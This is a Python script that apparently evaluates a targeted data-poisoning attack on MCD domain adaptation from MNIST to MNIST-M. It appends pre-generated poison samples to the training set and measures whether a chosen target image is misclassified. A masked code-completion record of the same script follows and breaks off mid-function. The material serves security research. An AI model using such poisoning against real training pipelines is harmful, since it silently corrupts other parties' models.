with open('../../../../MNIST_MNIST-m/mnistm_data.pkl', 'rb') as _mnistm_file:
    mnistm = pkl.load(_mnistm_file)
x_train_mnistm_all = mnistm['train']/255.
x_test_mnistm_all = mnistm['test']/255.
# Restrict both domains to two digit classes; MNIST-M is index-aligned with MNIST,
# so the same index arrays select the corresponding MNIST-M images.
picked_class = 3
picked_class_next = 8
train_points_class_0 = np.argwhere(y_train_mnist_all == picked_class).flatten()
train_points_class_1 = np.argwhere(y_train_mnist_all == picked_class_next).flatten()
test_points_class_0 = np.argwhere(y_test_mnist_all == picked_class).flatten()
test_points_class_1 = np.argwhere(y_test_mnist_all == picked_class_next).flatten()
x_train_mnist = x_train_mnist_all[np.concatenate([train_points_class_0, train_points_class_1])]
y_train_mnist = y_train_mnist_all[np.concatenate([train_points_class_0, train_points_class_1])]
x_test_mnist = x_test_mnist_all[np.concatenate([test_points_class_0, test_points_class_1])]
y_test_mnist = y_test_mnist_all[np.concatenate([test_points_class_0, test_points_class_1])]
x_train_mnistm = x_train_mnistm_all[np.concatenate([train_points_class_0, train_points_class_1])]
x_test_mnistm = x_test_mnistm_all[np.concatenate([test_points_class_0, test_points_class_1])]
# Relabel the picked digits to 0/1 for the binary task.
zeros_train = np.argwhere(y_train_mnist == picked_class).flatten()
ones_train = np.argwhere(y_train_mnist == picked_class_next).flatten()
zeros_test = np.argwhere(y_test_mnist == picked_class).flatten()
ones_test = np.argwhere(y_test_mnist == picked_class_next).flatten()
y_train_mnist[zeros_train] = 0
y_train_mnist[ones_train] = 1
y_test_mnist[zeros_test] = 0
y_test_mnist[ones_test] = 1
y_train_mnist = keras.utils.to_categorical(y_train_mnist, NUM_CLASSES_MAIN)
y_test_mnist = keras.utils.to_categorical(y_test_mnist, NUM_CLASSES_MAIN)
# The single attacked target point and its true label; build the "flipped"
# one-hot label the poisoning attack tries to induce.
x_target_test = np.load("data/" + METHOD + "_TARGET_DATA.npy")
y_target_test = np.load("data/" + METHOD + "_TARGET_LABEL.npy")
y_target_test_incorrect_label = np.zeros([1, NUM_CLASSES_MAIN])
target_correct_label = np.argmax(y_target_test,1).flatten()[0]
y_target_test_incorrect_label[0][(target_correct_label+1)%NUM_CLASSES_MAIN]=1
if USE_POISON:
    # Append the pre-generated poison points to the source training set.
    x_poison = np.load("data/" + METHOD + "_GENERATED_POISON_DATA.npy")
    y_poison = np.load("data/" + METHOD + "_GENERATED_POISON_LABELS.npy")
    x_train_mnist = np.concatenate([x_train_mnist, x_poison])
    y_train_mnist = np.concatenate([y_train_mnist, y_poison])
# ---- Main training loop: alternate the three MCD steps every batch ----
for epoch in range(EPOCHS):
    # Number of batches, rounded up to cover a partial final batch.
    nb_batches_train = int(len(x_train_mnist)/BATCH_SIZE)
    if len(x_train_mnist) % BATCH_SIZE != 0:
        nb_batches_train += 1
    # Fresh shuffle of the source indices each epoch.
    ind_shuf = np.arange(len(x_train_mnist))
    np.random.shuffle(ind_shuf)
    for batch in range(nb_batches_train):
        ind_batch = range(BATCH_SIZE * batch, min(BATCH_SIZE * (1+batch), len(x_train_mnist)))
        ind_source = ind_shuf[ind_batch]
        # Pair every source batch with a random target batch (sampled without replacement).
        ind_target = np.random.choice(len(x_train_mnistm), size=len(ind_source), replace=False)
        x_source_batch = x_train_mnist[ind_source]
        y_source_batch = y_train_mnist[ind_source]
        x_target_batch = x_train_mnistm[ind_target]
        # (A) supervised ERM step, (B) maximize head discrepancy on target,
        # (C) minimize it through the shared feature extractor.
        train_step_erm(x_source_batch, y_source_batch)
        train_discrepancy_1(x_source_batch, y_source_batch, x_target_batch)
        train_discrepancy_2(x_target_batch)
    if epoch % 20 == 0:
        # Periodic evaluation across the ensemble: attack success (target point
        # scored against the flipped label), accuracy on the true target label,
        # clean target-domain test accuracy, and accuracy on the poison set.
        print("Full training Poisoning:", USE_POISON, "MNIST->MNIST_M:", epoch, "METHOD:", METHOD, "\n")
        print([eval_accuracy_main_cdan(x_target_test, y_target_test_incorrect_label, shared[i], main_classifier_1[i]) for i in range(NUM_MODELS)])
        print([eval_accuracy_main_cdan(x_target_test, y_target_test, shared[i], main_classifier_1[i]) for i in range(NUM_MODELS)])
        print([eval_accuracy_main_cdan(x_test_mnistm, y_test_mnist, shared[i], main_classifier_1[i]) for i in range(NUM_MODELS)])
        if USE_POISON:
            print([eval_accuracy_main_cdan(x_poison, y_poison, shared[i], main_classifier_1[i]) for i in range(NUM_MODELS)])
        print("\n")
|
normal
|
{
"blob_id": "465d5baae8d5be77fbf3d550d10667da420a8fbe",
"index": 8608,
"step-1": "<mask token>\n\n\n@tf.function\ndef train_discrepancy_1(main_data, main_labels, target_data):\n with tf.GradientTape(persistent=True) as tape:\n shared_main = [shared[i](main_data, training=True) for i in range(\n NUM_MODELS)]\n main_logits_1 = [main_classifier_1[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n main_logits_2 = [main_classifier_2[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n main_loss = [(ce_loss(main_labels, main_logits_1[i]) + ce_loss(\n main_labels, main_logits_2[i])) for i in range(NUM_MODELS)]\n shared_target = [shared[i](target_data, training=True) for i in\n range(NUM_MODELS)]\n target_logits_1 = [main_classifier_1[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n target_logits_2 = [main_classifier_2[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n adv_loss = [tf.reduce_mean(tf.reduce_mean(tf.abs(tf.nn.softmax(\n target_logits_1[i]) - tf.nn.softmax(target_logits_2[i])), 1)) for\n i in range(NUM_MODELS)]\n loss = [(main_loss[i] - adv_loss[i]) for i in range(NUM_MODELS)]\n gradients_main_classifier_1 = [tape.gradient(loss[i], main_classifier_1\n [i].trainable_variables) for i in range(NUM_MODELS)]\n gradients_main_classifier_2 = [tape.gradient(loss[i], main_classifier_2\n [i].trainable_variables) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_1[i].apply_gradients(zip(\n gradients_main_classifier_1[i], main_classifier_1[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_2[i].apply_gradients(zip(\n gradients_main_classifier_2[i], main_classifier_2[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n return adv_loss\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@tf.function\ndef train_discrepancy_1(main_data, main_labels, target_data):\n with tf.GradientTape(persistent=True) as tape:\n shared_main = [shared[i](main_data, training=True) for i in range(\n NUM_MODELS)]\n main_logits_1 = [main_classifier_1[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n main_logits_2 = [main_classifier_2[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n main_loss = [(ce_loss(main_labels, main_logits_1[i]) + ce_loss(\n main_labels, main_logits_2[i])) for i in range(NUM_MODELS)]\n shared_target = [shared[i](target_data, training=True) for i in\n range(NUM_MODELS)]\n target_logits_1 = [main_classifier_1[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n target_logits_2 = [main_classifier_2[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n adv_loss = [tf.reduce_mean(tf.reduce_mean(tf.abs(tf.nn.softmax(\n target_logits_1[i]) - tf.nn.softmax(target_logits_2[i])), 1)) for\n i in range(NUM_MODELS)]\n loss = [(main_loss[i] - adv_loss[i]) for i in range(NUM_MODELS)]\n gradients_main_classifier_1 = [tape.gradient(loss[i], main_classifier_1\n [i].trainable_variables) for i in range(NUM_MODELS)]\n gradients_main_classifier_2 = [tape.gradient(loss[i], main_classifier_2\n [i].trainable_variables) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_1[i].apply_gradients(zip(\n gradients_main_classifier_1[i], main_classifier_1[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_2[i].apply_gradients(zip(\n gradients_main_classifier_2[i], main_classifier_2[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n return adv_loss\n\n\n@tf.function\ndef train_discrepancy_2(target_data):\n with tf.GradientTape(persistent=True) as tape:\n shared_target = [shared[i](target_data, training=True) for i in\n range(NUM_MODELS)]\n target_logits_1 = [main_classifier_1[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n 
target_logits_2 = [main_classifier_2[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n adv_loss = [tf.reduce_mean(tf.abs(tf.nn.softmax(target_logits_1[i]) -\n tf.nn.softmax(target_logits_2[i]))) for i in range(NUM_MODELS)]\n gradients_shared = [tape.gradient(adv_loss[i], shared[i].\n trainable_variables) for i in range(NUM_MODELS)]\n [optimizer_shared[i].apply_gradients(zip(gradients_shared[i], shared[i]\n .trainable_variables)) for i in range(NUM_MODELS)]\n return adv_loss\n\n\n@tf.function\ndef train_step_erm(main_data, main_labels):\n with tf.GradientTape(persistent=True) as tape:\n shared_main = [shared[i](main_data, training=True) for i in range(\n NUM_MODELS)]\n main_logits_1 = [main_classifier_1[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n main_logits_2 = [main_classifier_2[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n loss = [(ce_loss(main_labels, main_logits_1[i]) + ce_loss(\n main_labels, main_logits_2[i])) for i in range(NUM_MODELS)]\n gradients_shared = [tape.gradient(loss[i], shared[i].\n trainable_variables) for i in range(NUM_MODELS)]\n gradients_main_classifier_1 = [tape.gradient(loss[i], main_classifier_1\n [i].trainable_variables) for i in range(NUM_MODELS)]\n gradients_main_classifier_2 = [tape.gradient(loss[i], main_classifier_2\n [i].trainable_variables) for i in range(NUM_MODELS)]\n [optimizer_shared[i].apply_gradients(zip(gradients_shared[i], shared[i]\n .trainable_variables)) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_1[i].apply_gradients(zip(\n gradients_main_classifier_1[i], main_classifier_1[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_2[i].apply_gradients(zip(\n gradients_main_classifier_2[i], main_classifier_2[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n return loss\n\n\n<mask token>\n",
"step-3": "<mask token>\nsys.path.append('../')\n<mask token>\nparser.add_argument('--USE_POISON', type=int, default=1, help=\n 'POISON used or not')\n<mask token>\n\n\n@tf.function\ndef train_discrepancy_1(main_data, main_labels, target_data):\n with tf.GradientTape(persistent=True) as tape:\n shared_main = [shared[i](main_data, training=True) for i in range(\n NUM_MODELS)]\n main_logits_1 = [main_classifier_1[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n main_logits_2 = [main_classifier_2[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n main_loss = [(ce_loss(main_labels, main_logits_1[i]) + ce_loss(\n main_labels, main_logits_2[i])) for i in range(NUM_MODELS)]\n shared_target = [shared[i](target_data, training=True) for i in\n range(NUM_MODELS)]\n target_logits_1 = [main_classifier_1[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n target_logits_2 = [main_classifier_2[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n adv_loss = [tf.reduce_mean(tf.reduce_mean(tf.abs(tf.nn.softmax(\n target_logits_1[i]) - tf.nn.softmax(target_logits_2[i])), 1)) for\n i in range(NUM_MODELS)]\n loss = [(main_loss[i] - adv_loss[i]) for i in range(NUM_MODELS)]\n gradients_main_classifier_1 = [tape.gradient(loss[i], main_classifier_1\n [i].trainable_variables) for i in range(NUM_MODELS)]\n gradients_main_classifier_2 = [tape.gradient(loss[i], main_classifier_2\n [i].trainable_variables) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_1[i].apply_gradients(zip(\n gradients_main_classifier_1[i], main_classifier_1[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_2[i].apply_gradients(zip(\n gradients_main_classifier_2[i], main_classifier_2[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n return adv_loss\n\n\n@tf.function\ndef train_discrepancy_2(target_data):\n with tf.GradientTape(persistent=True) as tape:\n shared_target = [shared[i](target_data, 
training=True) for i in\n range(NUM_MODELS)]\n target_logits_1 = [main_classifier_1[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n target_logits_2 = [main_classifier_2[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n adv_loss = [tf.reduce_mean(tf.abs(tf.nn.softmax(target_logits_1[i]) -\n tf.nn.softmax(target_logits_2[i]))) for i in range(NUM_MODELS)]\n gradients_shared = [tape.gradient(adv_loss[i], shared[i].\n trainable_variables) for i in range(NUM_MODELS)]\n [optimizer_shared[i].apply_gradients(zip(gradients_shared[i], shared[i]\n .trainable_variables)) for i in range(NUM_MODELS)]\n return adv_loss\n\n\n@tf.function\ndef train_step_erm(main_data, main_labels):\n with tf.GradientTape(persistent=True) as tape:\n shared_main = [shared[i](main_data, training=True) for i in range(\n NUM_MODELS)]\n main_logits_1 = [main_classifier_1[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n main_logits_2 = [main_classifier_2[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n loss = [(ce_loss(main_labels, main_logits_1[i]) + ce_loss(\n main_labels, main_logits_2[i])) for i in range(NUM_MODELS)]\n gradients_shared = [tape.gradient(loss[i], shared[i].\n trainable_variables) for i in range(NUM_MODELS)]\n gradients_main_classifier_1 = [tape.gradient(loss[i], main_classifier_1\n [i].trainable_variables) for i in range(NUM_MODELS)]\n gradients_main_classifier_2 = [tape.gradient(loss[i], main_classifier_2\n [i].trainable_variables) for i in range(NUM_MODELS)]\n [optimizer_shared[i].apply_gradients(zip(gradients_shared[i], shared[i]\n .trainable_variables)) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_1[i].apply_gradients(zip(\n gradients_main_classifier_1[i], main_classifier_1[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_2[i].apply_gradients(zip(\n gradients_main_classifier_2[i], main_classifier_2[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n 
return loss\n\n\n<mask token>\nif USE_POISON:\n x_poison = np.load('data/' + METHOD + '_GENERATED_POISON_DATA.npy')\n y_poison = np.load('data/' + METHOD + '_GENERATED_POISON_LABELS.npy')\n x_train_mnist = np.concatenate([x_train_mnist, x_poison])\n y_train_mnist = np.concatenate([y_train_mnist, y_poison])\nfor epoch in range(EPOCHS):\n nb_batches_train = int(len(x_train_mnist) / BATCH_SIZE)\n if len(x_train_mnist) % BATCH_SIZE != 0:\n nb_batches_train += 1\n ind_shuf = np.arange(len(x_train_mnist))\n np.random.shuffle(ind_shuf)\n for batch in range(nb_batches_train):\n ind_batch = range(BATCH_SIZE * batch, min(BATCH_SIZE * (1 + batch),\n len(x_train_mnist)))\n ind_source = ind_shuf[ind_batch]\n ind_target = np.random.choice(len(x_train_mnistm), size=len(\n ind_source), replace=False)\n x_source_batch = x_train_mnist[ind_source]\n y_source_batch = y_train_mnist[ind_source]\n x_target_batch = x_train_mnistm[ind_target]\n train_step_erm(x_source_batch, y_source_batch)\n train_discrepancy_1(x_source_batch, y_source_batch, x_target_batch)\n train_discrepancy_2(x_target_batch)\n if epoch % 20 == 0:\n print('Full training Poisoning:', USE_POISON, 'MNIST->MNIST_M:',\n epoch, 'METHOD:', METHOD, '\\n')\n print([eval_accuracy_main_cdan(x_target_test,\n y_target_test_incorrect_label, shared[i], main_classifier_1[i]) for\n i in range(NUM_MODELS)])\n print([eval_accuracy_main_cdan(x_target_test, y_target_test, shared\n [i], main_classifier_1[i]) for i in range(NUM_MODELS)])\n print([eval_accuracy_main_cdan(x_test_mnistm, y_test_mnist, shared[\n i], main_classifier_1[i]) for i in range(NUM_MODELS)])\n if USE_POISON:\n print([eval_accuracy_main_cdan(x_poison, y_poison, shared[i],\n main_classifier_1[i]) for i in range(NUM_MODELS)])\n print('\\n')\n",
"step-4": "<mask token>\nsys.path.append('../')\n<mask token>\nparser = argparse.ArgumentParser(description='Training', formatter_class=\n argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument('--USE_POISON', type=int, default=1, help=\n 'POISON used or not')\nargs = parser.parse_args()\nUSE_POISON = bool(args.USE_POISON)\nMETHOD = 'mcd'\nIMG_WIDTH = 28\nIMG_HEIGHT = 28\nNCH = 3\nNUM_CLASSES_MAIN = 2\nNUM_CLASSES_DC = 2\nEPOCHS = 101\nBATCH_SIZE = 64\nPLOT_POINTS = 100\nNUM_MODELS = 5\nce_loss = tf.keras.losses.CategoricalCrossentropy(from_logits=True)\nshared = [mnist2mnistm_shared_discrepancy([50000, IMG_HEIGHT, IMG_WIDTH,\n NCH]) for i in range(NUM_MODELS)]\nmain_classifier_1 = [mnist2mnistm_predictor_discrepancy(shared[i],\n NUM_CLASSES_MAIN, 768) for i in range(NUM_MODELS)]\nmain_classifier_2 = [mnist2mnistm_predictor_discrepancy(shared[i],\n NUM_CLASSES_MAIN, 768) for i in range(NUM_MODELS)]\noptimizer_shared = [tf.keras.optimizers.Adam(0.001, beta_1=0.5) for i in\n range(NUM_MODELS)]\noptimizer_main_classifier_1 = [tf.keras.optimizers.Adam(0.001, beta_1=0.5) for\n i in range(NUM_MODELS)]\noptimizer_main_classifier_2 = [tf.keras.optimizers.Adam(0.001, beta_1=0.5) for\n i in range(NUM_MODELS)]\n\n\n@tf.function\ndef train_discrepancy_1(main_data, main_labels, target_data):\n with tf.GradientTape(persistent=True) as tape:\n shared_main = [shared[i](main_data, training=True) for i in range(\n NUM_MODELS)]\n main_logits_1 = [main_classifier_1[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n main_logits_2 = [main_classifier_2[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n main_loss = [(ce_loss(main_labels, main_logits_1[i]) + ce_loss(\n main_labels, main_logits_2[i])) for i in range(NUM_MODELS)]\n shared_target = [shared[i](target_data, training=True) for i in\n range(NUM_MODELS)]\n target_logits_1 = [main_classifier_1[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n target_logits_2 = 
[main_classifier_2[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n adv_loss = [tf.reduce_mean(tf.reduce_mean(tf.abs(tf.nn.softmax(\n target_logits_1[i]) - tf.nn.softmax(target_logits_2[i])), 1)) for\n i in range(NUM_MODELS)]\n loss = [(main_loss[i] - adv_loss[i]) for i in range(NUM_MODELS)]\n gradients_main_classifier_1 = [tape.gradient(loss[i], main_classifier_1\n [i].trainable_variables) for i in range(NUM_MODELS)]\n gradients_main_classifier_2 = [tape.gradient(loss[i], main_classifier_2\n [i].trainable_variables) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_1[i].apply_gradients(zip(\n gradients_main_classifier_1[i], main_classifier_1[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_2[i].apply_gradients(zip(\n gradients_main_classifier_2[i], main_classifier_2[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n return adv_loss\n\n\n@tf.function\ndef train_discrepancy_2(target_data):\n with tf.GradientTape(persistent=True) as tape:\n shared_target = [shared[i](target_data, training=True) for i in\n range(NUM_MODELS)]\n target_logits_1 = [main_classifier_1[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n target_logits_2 = [main_classifier_2[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n adv_loss = [tf.reduce_mean(tf.abs(tf.nn.softmax(target_logits_1[i]) -\n tf.nn.softmax(target_logits_2[i]))) for i in range(NUM_MODELS)]\n gradients_shared = [tape.gradient(adv_loss[i], shared[i].\n trainable_variables) for i in range(NUM_MODELS)]\n [optimizer_shared[i].apply_gradients(zip(gradients_shared[i], shared[i]\n .trainable_variables)) for i in range(NUM_MODELS)]\n return adv_loss\n\n\n@tf.function\ndef train_step_erm(main_data, main_labels):\n with tf.GradientTape(persistent=True) as tape:\n shared_main = [shared[i](main_data, training=True) for i in range(\n NUM_MODELS)]\n main_logits_1 = [main_classifier_1[i](shared_main[i], training=True\n ) for i in 
range(NUM_MODELS)]\n main_logits_2 = [main_classifier_2[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n loss = [(ce_loss(main_labels, main_logits_1[i]) + ce_loss(\n main_labels, main_logits_2[i])) for i in range(NUM_MODELS)]\n gradients_shared = [tape.gradient(loss[i], shared[i].\n trainable_variables) for i in range(NUM_MODELS)]\n gradients_main_classifier_1 = [tape.gradient(loss[i], main_classifier_1\n [i].trainable_variables) for i in range(NUM_MODELS)]\n gradients_main_classifier_2 = [tape.gradient(loss[i], main_classifier_2\n [i].trainable_variables) for i in range(NUM_MODELS)]\n [optimizer_shared[i].apply_gradients(zip(gradients_shared[i], shared[i]\n .trainable_variables)) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_1[i].apply_gradients(zip(\n gradients_main_classifier_1[i], main_classifier_1[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_2[i].apply_gradients(zip(\n gradients_main_classifier_2[i], main_classifier_2[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n return loss\n\n\nmnist = tf.keras.datasets.mnist\n(x_train_mnist_all, y_train_mnist_all), (x_test_mnist_all, y_test_mnist_all\n ) = mnist.load_data()\nx_train_mnist_all = np.stack((x_train_mnist_all,) * 3, axis=-1) / 255.0\nx_test_mnist_all = np.stack((x_test_mnist_all,) * 3, axis=-1) / 255.0\nmnistm = pkl.load(open('../../../../MNIST_MNIST-m/mnistm_data.pkl', 'rb'))\nx_train_mnistm_all = mnistm['train'] / 255.0\nx_test_mnistm_all = mnistm['test'] / 255.0\npicked_class = 3\npicked_class_next = 8\ntrain_points_class_0 = np.argwhere(y_train_mnist_all == picked_class).flatten()\ntrain_points_class_1 = np.argwhere(y_train_mnist_all == picked_class_next\n ).flatten()\ntest_points_class_0 = np.argwhere(y_test_mnist_all == picked_class).flatten()\ntest_points_class_1 = np.argwhere(y_test_mnist_all == picked_class_next\n ).flatten()\nx_train_mnist = x_train_mnist_all[np.concatenate([train_points_class_0,\n 
train_points_class_1])]\ny_train_mnist = y_train_mnist_all[np.concatenate([train_points_class_0,\n train_points_class_1])]\nx_test_mnist = x_test_mnist_all[np.concatenate([test_points_class_0,\n test_points_class_1])]\ny_test_mnist = y_test_mnist_all[np.concatenate([test_points_class_0,\n test_points_class_1])]\nx_train_mnistm = x_train_mnistm_all[np.concatenate([train_points_class_0,\n train_points_class_1])]\nx_test_mnistm = x_test_mnistm_all[np.concatenate([test_points_class_0,\n test_points_class_1])]\nzeros_train = np.argwhere(y_train_mnist == picked_class).flatten()\nones_train = np.argwhere(y_train_mnist == picked_class_next).flatten()\nzeros_test = np.argwhere(y_test_mnist == picked_class).flatten()\nones_test = np.argwhere(y_test_mnist == picked_class_next).flatten()\ny_train_mnist[zeros_train] = 0\ny_train_mnist[ones_train] = 1\ny_test_mnist[zeros_test] = 0\ny_test_mnist[ones_test] = 1\ny_train_mnist = keras.utils.to_categorical(y_train_mnist, NUM_CLASSES_MAIN)\ny_test_mnist = keras.utils.to_categorical(y_test_mnist, NUM_CLASSES_MAIN)\nx_target_test = np.load('data/' + METHOD + '_TARGET_DATA.npy')\ny_target_test = np.load('data/' + METHOD + '_TARGET_LABEL.npy')\ny_target_test_incorrect_label = np.zeros([1, NUM_CLASSES_MAIN])\ntarget_correct_label = np.argmax(y_target_test, 1).flatten()[0]\ny_target_test_incorrect_label[0][(target_correct_label + 1) % NUM_CLASSES_MAIN\n ] = 1\nif USE_POISON:\n x_poison = np.load('data/' + METHOD + '_GENERATED_POISON_DATA.npy')\n y_poison = np.load('data/' + METHOD + '_GENERATED_POISON_LABELS.npy')\n x_train_mnist = np.concatenate([x_train_mnist, x_poison])\n y_train_mnist = np.concatenate([y_train_mnist, y_poison])\nfor epoch in range(EPOCHS):\n nb_batches_train = int(len(x_train_mnist) / BATCH_SIZE)\n if len(x_train_mnist) % BATCH_SIZE != 0:\n nb_batches_train += 1\n ind_shuf = np.arange(len(x_train_mnist))\n np.random.shuffle(ind_shuf)\n for batch in range(nb_batches_train):\n ind_batch = range(BATCH_SIZE * batch, 
min(BATCH_SIZE * (1 + batch),\n len(x_train_mnist)))\n ind_source = ind_shuf[ind_batch]\n ind_target = np.random.choice(len(x_train_mnistm), size=len(\n ind_source), replace=False)\n x_source_batch = x_train_mnist[ind_source]\n y_source_batch = y_train_mnist[ind_source]\n x_target_batch = x_train_mnistm[ind_target]\n train_step_erm(x_source_batch, y_source_batch)\n train_discrepancy_1(x_source_batch, y_source_batch, x_target_batch)\n train_discrepancy_2(x_target_batch)\n if epoch % 20 == 0:\n print('Full training Poisoning:', USE_POISON, 'MNIST->MNIST_M:',\n epoch, 'METHOD:', METHOD, '\\n')\n print([eval_accuracy_main_cdan(x_target_test,\n y_target_test_incorrect_label, shared[i], main_classifier_1[i]) for\n i in range(NUM_MODELS)])\n print([eval_accuracy_main_cdan(x_target_test, y_target_test, shared\n [i], main_classifier_1[i]) for i in range(NUM_MODELS)])\n print([eval_accuracy_main_cdan(x_test_mnistm, y_test_mnist, shared[\n i], main_classifier_1[i]) for i in range(NUM_MODELS)])\n if USE_POISON:\n print([eval_accuracy_main_cdan(x_poison, y_poison, shared[i],\n main_classifier_1[i]) for i in range(NUM_MODELS)])\n print('\\n')\n",
"step-5": "import sys\r\nsys.path.append(\"../\")\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom utils import eval_accuracy_main_cdan\r\nfrom models import mnist2mnistm_shared_discrepancy, mnist2mnistm_predictor_discrepancy\r\nimport keras\r\nimport argparse\r\nimport pickle as pkl \r\n\r\nparser = argparse.ArgumentParser(description='Training', formatter_class=argparse.ArgumentDefaultsHelpFormatter)\r\nparser.add_argument('--USE_POISON', type=int, default=1, help='POISON used or not')\r\nargs = parser.parse_args()\r\nUSE_POISON = bool(args.USE_POISON)\r\nMETHOD = \"mcd\"\r\n\r\nIMG_WIDTH = 28\r\nIMG_HEIGHT = 28\r\nNCH = 3\r\n\r\nNUM_CLASSES_MAIN = 2\r\nNUM_CLASSES_DC = 2\r\n\r\nEPOCHS = 101\r\nBATCH_SIZE = 64\r\nPLOT_POINTS = 100\r\n\r\nNUM_MODELS = 5\r\n\r\nce_loss = tf.keras.losses.CategoricalCrossentropy(from_logits=True)\r\n\r\nshared = [mnist2mnistm_shared_discrepancy([50000, IMG_HEIGHT, IMG_WIDTH, NCH]) for i in range(NUM_MODELS)]\r\n\r\nmain_classifier_1 = [mnist2mnistm_predictor_discrepancy(shared[i], NUM_CLASSES_MAIN, 768) for i in range(NUM_MODELS)]#48*4*4, 500\r\nmain_classifier_2 = [mnist2mnistm_predictor_discrepancy(shared[i], NUM_CLASSES_MAIN, 768) for i in range(NUM_MODELS)]\r\n\r\noptimizer_shared = [tf.keras.optimizers.Adam(1E-3, beta_1=0.5) for i in range(NUM_MODELS)]\r\n\r\noptimizer_main_classifier_1 = [tf.keras.optimizers.Adam(1E-3, beta_1=0.5) for i in range(NUM_MODELS)]\r\noptimizer_main_classifier_2 = [tf.keras.optimizers.Adam(1E-3, beta_1=0.5) for i in range(NUM_MODELS)]\r\n\r\n@tf.function\r\ndef train_discrepancy_1(main_data, main_labels, target_data):\r\n # persistent is set to True because the tape is used more than\r\n # once to calculate the gradients.\r\n \r\n with tf.GradientTape(persistent=True) as tape:\r\n shared_main = [shared[i](main_data, training=True) for i in range(NUM_MODELS)]\r\n \r\n main_logits_1 = [main_classifier_1[i](shared_main[i], training=True) for i in range(NUM_MODELS)]\r\n main_logits_2 = 
[main_classifier_2[i](shared_main[i], training=True) for i in range(NUM_MODELS)]\r\n \r\n main_loss = [ce_loss(main_labels, main_logits_1[i]) + ce_loss(main_labels, main_logits_2[i]) for i in range(NUM_MODELS)]\r\n \r\n shared_target = [shared[i](target_data, training=True) for i in range(NUM_MODELS)]\r\n \r\n target_logits_1 = [main_classifier_1[i](shared_target[i], training=True) for i in range(NUM_MODELS)]\r\n target_logits_2 = [main_classifier_2[i](shared_target[i], training=True) for i in range(NUM_MODELS)]\r\n \r\n adv_loss = [tf.reduce_mean(tf.reduce_mean(tf.abs(tf.nn.softmax(target_logits_1[i]) - tf.nn.softmax(target_logits_2[i])), 1)) for i in range(NUM_MODELS)]\r\n \r\n loss = [main_loss[i] - adv_loss[i] for i in range(NUM_MODELS)]\r\n \r\n gradients_main_classifier_1 = [tape.gradient(loss[i], main_classifier_1[i].trainable_variables) for i in range(NUM_MODELS)]\r\n gradients_main_classifier_2 = [tape.gradient(loss[i], main_classifier_2[i].trainable_variables) for i in range(NUM_MODELS)]\r\n \r\n [optimizer_main_classifier_1[i].apply_gradients(zip(gradients_main_classifier_1[i], main_classifier_1[i].trainable_variables)) for i in range(NUM_MODELS)]\r\n [optimizer_main_classifier_2[i].apply_gradients(zip(gradients_main_classifier_2[i], main_classifier_2[i].trainable_variables)) for i in range(NUM_MODELS)]\r\n \r\n return adv_loss\r\n\r\n@tf.function\r\ndef train_discrepancy_2(target_data):\r\n # persistent is set to True because the tape is used more than\r\n # once to calculate the gradients.\r\n \r\n with tf.GradientTape(persistent=True) as tape:\r\n shared_target = [shared[i](target_data, training=True) for i in range(NUM_MODELS)]\r\n \r\n target_logits_1 = [main_classifier_1[i](shared_target[i], training=True) for i in range(NUM_MODELS)]\r\n target_logits_2 = [main_classifier_2[i](shared_target[i], training=True) for i in range(NUM_MODELS)]\r\n \r\n adv_loss = [tf.reduce_mean(tf.abs(tf.nn.softmax(target_logits_1[i]) - 
